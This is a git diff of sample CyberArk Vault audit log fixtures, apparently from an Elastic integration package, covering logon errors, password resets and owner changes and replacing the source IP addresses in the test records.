+<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}}
+<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.13"}}}
+<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.15"}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log
index 41f67cb2add..7763fe77b0f 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log
index f52711e43b9..2ba6ee49eb0 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log
index 6aee911c509..3e513ad1c03 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log
@@ -1,16 +1,16 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log
index 16ec40c4f3c..99bf81c1f96 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/33_update_owner.log
@@ -1,7 +1,7 @@ -<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update 